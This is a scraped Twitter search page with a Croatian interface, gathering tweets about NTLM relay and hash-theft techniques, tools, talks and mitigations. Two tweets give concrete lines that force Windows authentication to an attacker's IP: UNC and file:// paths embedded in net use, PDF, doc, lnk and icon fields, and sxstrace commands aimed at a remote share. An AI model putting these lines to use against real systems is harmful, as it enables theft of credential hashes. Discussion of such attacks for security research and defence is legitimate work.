Rezultati pretraživanja
  1. 30. tra 2019.

    Did know that u can steal by changing port to bypass sec-things: net use \\1.2.3.4@80\t or pdf : /F (\\\\IP@80\\t) or dubdoc : ///IP@80/t or doc: Target="file://IP@80/t.dotx" or lnk: URL=file://IP@80/t.htm or: IconFile=\\IP@80\t.ico cc

    Prikaži ovu nit
  2. prije 7 sati

    What is your favorite internal Network penetration test? What are the tools associated? Starting with: responder + ntlmrelay. You?

  3. 24. sij

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

  4. 20. pro 2019.

    I'm happy to share that the talk I've submitted with "Advanced Credential Relaying Techniques and How to Thwart Them" got accepted to . You don't want to miss this talk if you're interested with what is the latest in relay...

  5. 7. pro 2019.

    NTLMRecon - A fast reconnaissance and information gathering tool without external dependencies

  6. Rainbow Crackalack - Rainbow Table Generation And Lookup Tools

  7. 17. stu 2019.

    The talk I gave with on relay is now available online! If you haven't seen it live and you're interested in security you should definitely check it out!

  8. 21. kol 2019.

    great to see is taking action to reduce attack surface by advising customers to enable LDAP relay mitigations. We talked about these issues at our and talks.

  9. 9. kol 2019.

    Thanks to everyone who came to our talk! Was great to be back. Now seriously... Stop using 🚫😅

  10. 31. srp 2019.
    Prikaži ovu nit
  11. 11. lip 2019.

    Critical Vulnerabilities in Allow Remote Code Execution and Cloud Resources Compromise

  12. 11. lip 2019.

    1/ TLDR: is a pig. Outdated protocol with inherent insolvable problems. Due to backward compatibility Microsoft wasn't able to get rid of it. So they had to put on lipstick, makeup and mascara. But it is still a pig. Details of the attacks below (& I assume)

    Prikaži ovu nit
  13. Firework - Leveraging Microsoft Workspaces in a Penetration Test

  14. - An Relay Tool To The EWS Endpoint For On-Premise Exchange Servers (Provides An For Hackers)

  15. NtlmRelayToEWS - Relay Attack To Exchange Web Services

  16. 3. svi 2018.

    Bad-PDF - Steal Hashes with Bad-PDF Author:

  17. 2. svi 2018.
  18. 5. tra 2018.

    How to leak NTLM hash via HTML tags (for Internet Explorer and Edge):

  19. 27. velj 2018.

    Cracking Windows Passwords. ¿Sabes cómo almacena Windows las contraseñas y cómo se pueden crackear ?

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.